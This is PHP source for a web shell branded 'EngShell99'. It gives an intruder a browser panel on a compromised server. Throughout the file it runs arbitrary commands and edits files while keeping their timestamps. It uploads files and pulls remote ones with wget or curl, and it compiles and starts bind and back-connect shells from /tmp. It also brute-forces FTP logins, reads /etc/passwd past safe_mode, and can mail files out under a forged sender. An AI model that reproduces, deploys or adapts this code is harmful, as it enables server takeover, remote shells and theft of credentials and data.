+FnZT0iamF2YXNjcmlwdDEuMSI+aG90bG9nX2pzPSIxLjEiO2hvdGxvZ19yKz0iJmo9IisobmF2aWdhdG9yLmphdmFFbmFibGVkKCk/IlkiOiJOIik8L +3NjcmlwdD48c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0MS4yIj5ob3Rsb2dfanM9IjEuMiI7aG90bG9nX3IrPSImd2g9IitzY3JlZW4ud2lkdGgr +J3gnK3NjcmVlbi5oZWlnaHQrIiZweD0iKygoKG5hdmlnYXRvci5hcHBOYW1lLnN1YnN0cmluZygwLDMpPT0iTWljIikpP3NjcmVlbi5jb2xvckRlcHR +oOnNjcmVlbi5waXhlbERlcHRoKTwvc2NyaXB0PjxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQxLjMiPmhvdGxvZ19qcz0iMS4zIjwvc2NyaXB0Pj +xzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmhvdGxvZ19yKz0iJmpzPSIraG90bG9nX2pzO2RvY3VtZW50LndyaXRlKCI8YSBocmVmPSdodHRwO +i8vY2xpY2suaG90bG9nLnJ1Lz84MTYwNicgdGFyZ2V0PSdfdG9wJz48aW1nICIrIiBzcmM9J2h0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2hv +dGxvZy9jb3VudD8iK2hvdGxvZ19yKyImJyBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIGFsdD0xPjwvYT4iKTwvc2NyaXB0Pjxub3NjcmlwdD48YSB +ocmVmPWh0dHA6Ly9jbGljay5ob3Rsb2cucnUvPzgxNjA2IHRhcmdldD1fdG9wPjxpbWdzcmM9Imh0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2 +hvdGxvZy9jb3VudD9zPTgxNjA2JmltPTEiIGJvcmRlcj0wd2lkdGg9IjEiIGhlaWdodD0iMSIgYWx0PSJIb3RMb2ciPjwvYT48L25vc2NyaXB0Pg=="; +$c2 = "PCEtLUxpdmVJbnRlcm5ldCBjb3VudGVyLS0+PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCI+PCEtLQ0KZG9jdW1lbnQud3JpdGUoJzxh +IGhyZWY9Imh0dHA6Ly93d3cubGl2ZWludGVybmV0LnJ1L2NsaWNrIiAnKw0KJ3RhcmdldD1fYmxhbms+PGltZyBzcmM9Imh0dHA6Ly9jb3VudGVyLnl +hZHJvLnJ1L2hpdD90NTIuNjtyJysNCmVzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrKCh0eXBlb2Yoc2NyZWVuKT09J3VuZGVmaW5lZCcpPycnOg0KJz +tzJytzY3JlZW4ud2lkdGgrJyonK3NjcmVlbi5oZWlnaHQrJyonKyhzY3JlZW4uY29sb3JEZXB0aD8NCnNjcmVlbi5jb2xvckRlcHRoOnNjcmVlbi5wa +XhlbERlcHRoKSkrJzsnK01hdGgucmFuZG9tKCkrDQonIiBhbHQ9ImxpdmVpbnRlcm5ldC5ydTog7+7q4Ofg7e4g9+jx6+4g7/Du8ezu8vDu4iDoIO/u +8eXy6PLl6+XpIOfgIDI0IPfg8eAiICcrDQonYm9yZGVyPTAgd2lkdGg9MCBoZWlnaHQ9MD48L2E+JykvLy0tPjwvc2NyaXB0PjwhLS0vTGl2ZUludGV +ybmV0LS0+"; +if($unix) + { + if(!isset($_COOKIE['uname'])) { $uname = ex('uname -a'); setcookie('uname',$uname); } else { $uname = $_COOKIE['uname']; } + if(!isset($_COOKIE['id'])) { $id = ex('id'); setcookie('id',$id); } else { $id = $_COOKIE['id']; } + if($safe_mode) { $sysctl = '-'; } + else if(isset($_COOKIE['sysctl'])) { $sysctl = $_COOKIE['sysctl']; } + else + { + $sysctl = ex('sysctl -n kern.ostype && sysctl -n kern.osrelease'); + if(empty($sysctl)) { $sysctl = ex('sysctl -n kernel.ostype && sysctl -n kernel.osrelease'); } + if(empty($sysctl)) { $sysctl = '-'; } + setcookie('sysctl',$sysctl); + } + } +echo $head; +echo ''; +if(empty($_POST['cmd'])) { +$serv = array(127,192,172,10); +$addr=@explode('.', $_SERVER['SERVER_ADDR']); +$current_version = str_replace('.','',$version); +//if (!in_array($addr[0], $serv)) { +//@print "Version ".$current_version." :P"; +//@readfile ("http://rst.void.ru/EngShell99_version/version.php?version=".$current_version."");} +} +echo '
'.ws(2).'"'.ws(2).'EngShell'.$version.'@ '; +echo ws(2)."".date ("d-m-Y H:i:s").""; +echo ws(2).$lb." phpinfo ".$rb; +echo ws(2).$lb." php.ini ".$rb; +if($unix) + { + echo ws(2).$lb." cpu ".$rb; + echo ws(2).$lb." mem ".$rb; + echo ws(2).$lb." users ".$rb; + } +echo ws(2).$lb." tmp ".$rb; +echo ws(2).$lb." delete ".$rb."
"; +echo ws(2)."safe_mode: "; +echo (($safe_mode)?("SAFEMODE-IS-ON"):("SAFEMODE-IS-OFF")); +echo "".ws(2); +echo "PHP version: ".@phpversion().""; +$curl_on = @function_exists('curl_version'); +echo ws(2); +echo "cURL: ".(($curl_on)?("ON"):("OFF")); +echo "".ws(2); +echo "MySQL: "; +$mysql_on = @function_exists('mysql_connect'); +if($mysql_on){ +echo "ON"; } else { echo "OFF"; } +echo "".ws(2); +echo "MSSQL: "; +$mssql_on = @function_exists('mssql_connect'); +if($mssql_on){echo "ON";}else{echo "OFF";} +echo "".ws(2); +echo "PostgreSQL: "; +$pg_on = @function_exists('pg_connect'); +if($pg_on){echo "ON";}else{echo "OFF";} +echo "".ws(2); +echo "Oracle: "; +$ora_on = @function_exists('ocilogon'); +if($ora_on){echo "ON";}else{echo "OFF";} +echo "
".ws(2); +echo "Disable functions : "; +if(''==($df=@ini_get('disable_functions'))){echo "NONE";}else{echo "$df";} +$free = @diskfreespace($dir); +if (!$free) {$free = 0;} +$all = @disk_total_space($dir); +if (!$all) {$all = 0;} +echo "
".ws(2)."Free space : ".view_size($free)." Total space: ".view_size($all).""; +echo '
+
+
'; +echo $font; +if($unix){ +echo 'uname -a :'.ws(1).'
sysctl :'.ws(1).'
$OSTYPE :'.ws(1).'
Server :'.ws(1).'
id :'.ws(1).'
pwd :'.ws(1).'

'; +echo "
"; +echo ""; +echo((!empty($uname))?(ws(3).@substr($uname,0,120)."
"):(ws(3).@substr(@php_uname(),0,120)."
")); +echo ws(3).$sysctl."
"; +echo ws(3).ex('echo $OSTYPE')."
"; +echo ws(3).@substr($SERVER_SOFTWARE,0,120)."
"; +if(!empty($id)) { echo ws(3).$id."
"; } +else if(function_exists('posix_geteuid') && function_exists('posix_getegid') && function_exists('posix_getgrgid') && function_exists('posix_getpwuid')) + { + $euserinfo = @posix_getpwuid(@posix_geteuid()); + $egroupinfo = @posix_getgrgid(@posix_getegid()); + echo ws(3).'uid='.$euserinfo['uid'].' ( '.$euserinfo['name'].' ) gid='.$egroupinfo['gid'].' ( '.$egroupinfo['name'].' )
'; + } +else echo ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."
"; +echo ws(3).$dir; +echo ws(3).'( '.perms(@fileperms($dir)).' )'; +echo "
"; +} +else +{ +echo 'OS :'.ws(1).'
Server :'.ws(1).'
User :'.ws(1).'
pwd :'.ws(1).'

'; +echo "
"; +echo ""; +echo ws(3).@substr(@php_uname(),0,120)."
"; +echo ws(3).@substr($SERVER_SOFTWARE,0,120)."
"; +echo ws(3).@getenv("USERNAME")."
"; +echo ws(3).$dir; +echo "
"; +} +echo ""; + +echo "
"; +/* +if(empty($c1)||empty($c2)) { die(); } +$f = '
'; +$f .= base64_decode($c1); +$f .= base64_decode($c2); +if(!empty($_POST['cmd']) && $_POST['cmd']=="mail") + { + $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$_POST['from']."\r\n"); + err(6+$res); + $_POST['cmd']=""; + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !empty($_POST['loc_file'])) + { + if(!$file=@fopen($_POST['loc_file'],"r")) { err(1,$_POST['loc_file']); $_POST['cmd']=""; } + else + { + $filename = @basename($_POST['loc_file']); + $filedump = @fread($file,@filesize($_POST['loc_file'])); + fclose($file); + $content_encoding=$mime_type=''; + compress($filename,$filedump,$_POST['compress']); + $attach = array( + "name"=>$filename, + "type"=>$mime_type, + "content"=>$filedump + ); + if(empty($_POST['subj'])) { $_POST['subj'] = 'file from EngShell99'; } + if(empty($_POST['from'])) { $_POST['from'] = 'admin@fbi.gov'; } + $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach); + err(6+$res); + $_POST['cmd']=""; + } + } +*/ +if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text") +{ +$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\''; +} +if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_") + { + switch($_POST['what']) + { + case 'own': + @chown($_POST['param1'],$_POST['param2']); + break; + case 'grp': + @chgrp($_POST['param1'],$_POST['param2']); + break; + case 'mod': + @chmod($_POST['param1'],intval($_POST['param2'], 8)); + break; + } + $_POST['cmd']=""; + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="mk") + { + switch($_POST['what']) + { + case 'file': + if($_POST['action'] == "create") + { + if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { err(2,$_POST['mk_name']); $_POST['cmd']=""; } + else { + fclose($file); + $_POST['e_name'] = $_POST['mk_name']; + $_POST['cmd']="edit_file"; + echo "
".$lang[$language.'_text61']."
"; + } + } + else if($_POST['action'] == "delete") + { + if(unlink($_POST['mk_name'])) echo "
".$lang[$language.'_text63']."
"; + $_POST['cmd']=""; + } + break; + case 'dir': + if($_POST['action'] == "create"){ + if(mkdir($_POST['mk_name'])) + { + $_POST['cmd']=""; + echo "
".$lang[$language.'_text62']."
"; + } + else { err(2,$_POST['mk_name']); $_POST['cmd']=""; } + } + else if($_POST['action'] == "delete"){ + if(rmdir($_POST['mk_name'])) echo "
".$lang[$language.'_text64']."
"; + $_POST['cmd']=""; + } + break; + } + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name'])) + { + if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); } + if(!$file=@fopen($_POST['e_name'],"r")) { err(1,$_POST['e_name']); $_POST['cmd']=""; } + else { + echo $table_up3; + echo $font; + echo "
"; + echo ws(3)."".$_POST['e_name'].""; + echo "
"; + echo ""; + echo ""; + echo ""; + echo (!empty($only_read)?("

".$lang[$language.'_text44']):("

")); + echo "
"; + echo "
"; + echo "
"; + echo ""; + exit(); + } + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file") + { + $mtime = @filemtime($_POST['e_name']); + if(!$file=@fopen($_POST['e_name'],"w")) { err(0,$_POST['e_name']); } + else { + if($unix) $_POST['e_text']=@str_replace("\r\n","\n",$_POST['e_text']); + @fwrite($file,$_POST['e_text']); + @touch($_POST['e_name'],$mtime,$mtime); + $_POST['cmd']=""; + echo "
".$lang[$language.'_text45']."
"; + } + } +if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C")) +{ + cf("/tmp/bd.c",$port_bind_bd_c); + $blah = ex("gcc -o /tmp/bd /tmp/bd.c"); + @unlink("/tmp/bd.c"); + $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &"); + $_POST['cmd']="ps -aux | grep bd"; +} +if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl")) +{ + cf("/tmp/bdpl",$port_bind_bd_pl); + $p2=which("perl"); + $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &"); + $_POST['cmd']="ps -aux | grep bdpl"; +} +if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl")) +{ + cf("/tmp/back",$back_connect); + $p2=which("perl"); + $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &"); + $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\""; +} +if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C")) +{ + cf("/tmp/back.c",$back_connect_c); + $blah = ex("gcc -o /tmp/backc /tmp/back.c"); + @unlink("/tmp/back.c"); + $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &"); + $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\""; +} +if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl")) +{ + cf("/tmp/dp",$datapipe_pl); + $p2=which("perl"); + $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &"); + $_POST['cmd']="ps -aux | grep dp"; +} +if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C")) +{ + cf("/tmp/dpc.c",$datapipe_c); + $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c"); + @unlink("/tmp/dpc.c"); + $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &"); + $_POST['cmd']="ps -aux | grep dpc"; +} +if (!empty($_POST['alias']) && isset($aliases[$_POST['alias']])) { $_POST['cmd'] = $aliases[$_POST['alias']]; } +if (!empty($HTTP_POST_FILES['userfile']['name'])) +{ +if(!empty($_POST['new_name'])) { $nfn = $_POST['new_name']; } +else { $nfn = $HTTP_POST_FILES['userfile']['name']; } +@copy($HTTP_POST_FILES['userfile']['tmp_name'], + $_POST['dir']."/".$nfn) + or print("
Error uploading file ".$HTTP_POST_FILES['userfile']['name']."
"); +} +if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file'])) +{ + switch($_POST['with']) + { + case wget: + $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file'].""; + break; + case fetch: + $_POST['cmd'] = which('fetch')." -o ".$_POST['loc_file']." -p ".$_POST['rem_file'].""; + break; + case lynx: + $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file'].""; + break; + case links: + $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file'].""; + break; + case GET: + $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file'].""; + break; + case curl: + $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file'].""; + break; + } +} +if(!empty($_POST['cmd']) && ($_POST['cmd']=="ftp_file_up" || $_POST['cmd']=="ftp_file_down")) + { + list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']); + if(empty($ftp_port)) { $ftp_port = 21; } + $connection = @ftp_connect ($ftp_server,$ftp_port,10); + if(!$connection) { err(3); } + else + { + if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { err(4); } + else + { + if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.((!$unix)?('\\'):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']); } + if($_POST['cmd']=="ftp_file_up") { @ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']); } + } + } + @ftp_close($connection); + $_POST['cmd'] = ""; + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="ftp_brute") + { + list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']); + if(empty($ftp_port)) { $ftp_port = 21; } + $connection = @ftp_connect ($ftp_server,$ftp_port,10); + if(!$connection) { err(3); $_POST['cmd'] = ""; } + else if(!$users=get_users()) { echo "
".$lang[$language.'_text96']."
"; $_POST['cmd'] = ""; } + @ftp_close($connection); + } +echo $table_up3; +if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=(!$unix)?("dir"):("ls -lia"); } +else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; } +echo $font.$lang[$language.'_text1'].": ".$_POST['cmd']."
tar cvzf googlecom.tgz /home/networks/domains/google.com/public_html
mysqldump -u USER -pPASSWORD DATABASE > HASILBACKUP.sql
"; +echo "
"; +echo ""; +echo ""; +function div_title($title, $id) +{ + return ''.$title.''; +} +function div($id) + { + if(isset($_COOKIE[$id]) && $_COOKIE[$id]==0) return ''.$table_end1.$fe; +} +echo $fs.$table_up1.div_title($lang[$language.'_text42'],'id3').$table_up2.div('id3').$ts; +echo sr(15,"".$lang[$language.'_text43'].$arrow."",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11'])); +echo $te.''.$table_end1.$fe; +if($safe_mode){ +echo $fs.$table_up1.div_title($lang[$language.'_text57'],'id4').$table_up2.div('id4').$ts; +echo sr(15,"".$lang[$language.'_text58'].$arrow."",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."".ws(3)."".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13'])); +echo $te.''.$table_end1.$fe; +} +if($safe_mode && $unix){ +echo $fs.$table_up1.div_title($lang[$language.'_text67'],'id5').$table_up2.div('id5').$ts; +echo sr(15,"".$lang[$language.'_text68'].$arrow."","".ws(2)."".$lang[$language.'_text69'].$arrow."".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):("filename"))).ws(2)."".$lang[$language.'_text70'].$arrow."".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.''.$table_end1.$fe; +} +if(!$safe_mode){ +$aliases2 = ''; +foreach ($aliases as $alias_name=>$alias_cmd) + { + $aliases2 .= ""; + } +echo $fs.$table_up1.div_title($lang[$language.'_text7'],'id6').$table_up2.div('id6').$ts; +echo sr(15,"".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."","".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.''.$table_end1.$fe; +} +echo $fs.$table_up1.div_title($lang[$language.'_text54'],'id7').$table_up2.div('id7').$ts; +echo sr(15,"".$lang[$language.'_text52'].$arrow."",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12'])); +echo sr(15,"".$lang[$language.'_text53'].$arrow."",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )"); +echo sr(15,"".$lang[$language.'_text55'].$arrow."",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir)); +echo $te.''.$table_end1.$fe; +if(!$safe_mode && $unix){ +echo $fs.$table_up1.div_title($lang[$language.'_text76'],'id8').$table_up2.div('id8').$ts; +echo sr(15,"".$lang[$language.'_text72'].$arrow."",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12'])); +echo sr(15,"".$lang[$language.'_text73'].$arrow."",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )"); +echo sr(15,"".$lang[$language.'_text74'].$arrow."",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir)); +echo $te.''.$table_end1.$fe; +} +echo $fs.$table_up1.div_title($lang[$language.'_text32'],'id9').$table_up2.$font; +echo "
".div('id9').""; +echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval'); +echo "
".ws(1).in('submit','submit',0,$lang[$language.'_butt1']); +echo "
"; +echo $table_end1.$fe; +if($safe_mode&&$curl_on) +{ +echo $fs.$table_up1.div_title($lang[$language.'_text33'],'id10').$table_up2.div('id10').$ts; +echo sr(15,"".$lang[$language.'_text30'].$arrow."",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.''.$table_end1.$fe; +} +if($safe_mode) +{ +echo $fs.$table_up1.div_title($lang[$language.'_text34'],'id11').$table_up2.div('id11').$ts; +echo "
"; +echo sr(15,"".$lang[$language.'_text30'].$arrow."",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.''.$table_end1.$fe; +} +if($safe_mode&&$mysql_on) +{ +echo $fs.$table_up1.div_title($lang[$language.'_text35'],'id12').$table_up2.div('id12').$ts; +echo sr(15,"".$lang[$language.'_text36'].$arrow."",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."".$lang[$language.'_text37'].$arrow."".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."".$lang[$language.'_text38'].$arrow."".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."".$lang[$language.'_text14'].$arrow."".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306")))); +echo sr(15,"".$lang[$language.'_text30'].$arrow."",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.''.$table_end1.$fe; +} +if($safe_mode&&$mssql_on) +{ +echo $fs.$table_up1.div_title($lang[$language.'_text85'],'id13').$table_up2.div('id13').$ts; +echo sr(15,"".$lang[$language.'_text36'].$arrow."",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."".$lang[$language.'_text37'].$arrow."".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."".$lang[$language.'_text38'].$arrow."".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."".$lang[$language.'_text14'].$arrow."".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433")))); +echo sr(15,"".$lang[$language.'_text3'].$arrow."",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.''.$table_end1.$fe; +} +if($safe_mode&&$unix&&function_exists('mb_send_mail')){ +echo $fs.$table_up1.div_title($lang[$language.'_text112'],'id22').$table_up2.div('id22').$ts; +echo sr(15,"".$lang[$language.'_text30'].$arrow."",in('text','test5_file',96,(!empty($_POST['test5_file'])?($_POST['test5_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test5').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.''.$table_end1.$fe; +} +if($safe_mode&&function_exists('imap_list')){ +echo $fs.$table_up1.div_title($lang[$language.'_text113'],'id23').$table_up2.div('id23').$ts; +echo sr(15,"".$lang[$language.'_text4'].$arrow."",in('text','test6_file',96,(!empty($_POST['test6_file'])?($_POST['test6_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test6').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.''.$table_end1.$fe; +} +if($safe_mode&&function_exists('imap_body')){ +echo $fs.$table_up1.div_title($lang[$language.'_text114'],'id24').$table_up2.div('id24').$ts; +echo sr(15,"".$lang[$language.'_text30'].$arrow."",in('text','test7_file',96,(!empty($_POST['test7_file'])?($_POST['test7_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test7').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.''.$table_end1.$fe; +} +if($safe_mode) +{ +echo $fs.$table_up1.div_title($lang[$language.'_text115'],'id25').$table_up2.div('id25').$ts; +echo sr(15,"".$lang[$language.'_text116'].$arrow."",in('text','test8_file1',96,(!empty($_POST['test8_file1'])?($_POST['test8_file1']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test8')); +echo sr(15,"".$lang[$language.'_text117'].$arrow."",in('text','test8_file2',96,(!empty($_POST['test8_file2'])?($_POST['test8_file2']):($dir))).ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.''.$table_end1.$fe; +} +if(@ini_get('file_uploads')){ +echo ""; +echo $table_up1.div_title($lang[$language.'_text5'],'id14').$table_up2.div('id14').$ts; +echo sr(15,"".$lang[$language.'_text6'].$arrow."",in('file','userfile',85,'')); +echo sr(15,"".$lang[$language.'_text21'].$arrow."",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2'])); +echo $te.''.$table_end1.$fe; +} +if(!$safe_mode&&$unix){ +echo $fs.$table_up1.div_title($lang[$language.'_text15'],'id15').$table_up2.div('id15').$ts; +echo sr(15,"".$lang[$language.'_text16'].$arrow."","".in('hidden','dir',0,$dir).ws(2)."".$lang[$language.'_text17'].$arrow."".in('text','rem_file',78,'http://')); +echo sr(15,"".$lang[$language.'_text18'].$arrow."",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2'])); +echo $te.''.$table_end1.$fe; +} +echo $fs.$table_up1.div_title($lang[$language.'_text86'],'id16').$table_up2.div('id16').$ts; +echo sr(15,"".$lang[$language.'_text59'].$arrow."",in('text','d_name',85,$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt14'])); +$arh = $lang[$language.'_text92']; +if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip'; } +if(@function_exists('gzencode')) { $arh .= in('radio','compress',0,'gzip').' gzip'; } +if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; } +echo sr(15,"".$lang[$language.'_text91'].$arrow."",in('radio','compress',0,'none',1).' '.$arh); +echo $te.''.$table_end1.$fe; +if(@function_exists("ftp_connect")){ +echo $table_up1.div_title($lang[$language.'_text93'],'id17').$table_up2.div('id17').$ts."".$fs."".$fe.$fs."".$fe."
".$ts; +echo "
".$lang[$language.'_text87']."
"; +echo sr(25,"".$lang[$language.'_text88'].$arrow."",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21")))); +echo sr(25,"".$lang[$language.'_text37'].$arrow."",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous")))); +echo sr(25,"".$lang[$language.'_text38'].$arrow."",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("admin@fbi.gov")))); +echo sr(25,"".$lang[$language.'_text89'].$arrow."",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_down')); +echo sr(25,"".$lang[$language.'_text18'].$arrow."",in('text','loc_file',45,$dir)); +echo sr(25,"".$lang[$language.'_text90'].$arrow."","".in('hidden','dir',0,$dir)); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt14'])); +echo $te."
".$ts; +echo "
".$lang[$language.'_text100']."
"; +echo sr(25,"".$lang[$language.'_text88'].$arrow."",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21")))); +echo sr(25,"".$lang[$language.'_text37'].$arrow."",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous")))); +echo sr(25,"".$lang[$language.'_text38'].$arrow."",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("admin@fbi.gov")))); +echo sr(25,"".$lang[$language.'_text18'].$arrow."",in('text','loc_file',45,$dir)); +echo sr(25,"".$lang[$language.'_text89'].$arrow."",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_up')); +echo sr(25,"".$lang[$language.'_text90'].$arrow."","".in('hidden','dir',0,$dir)); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt2'])); +echo $te."
"; +} +if($unix && @function_exists("ftp_connect")){ +echo $fs.$table_up1.div_title($lang[$language.'_text94'],'id18').$table_up2.div('id18').$ts; +echo sr(15,"".$lang[$language.'_text88'].$arrow."",in('text','ftp_server_port',85,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))).in('hidden','cmd',0,'ftp_brute').ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo sr(15,"","".$lang[$language.'_text99']." ( ".$lang[$language.'_text95']." )"); +echo sr(15,"",in('checkbox','reverse id=reverse',0,'1').$lang[$language.'_text101']); +echo $te.''.$table_end1.$fe; +} +if(@function_exists("mail")){ +echo $table_up1.div_title($lang[$language.'_text102'],'id19').$table_up2.div('id19').$ts."".$fs."".$ts; +echo "
".$lang[$language.'_text103']."
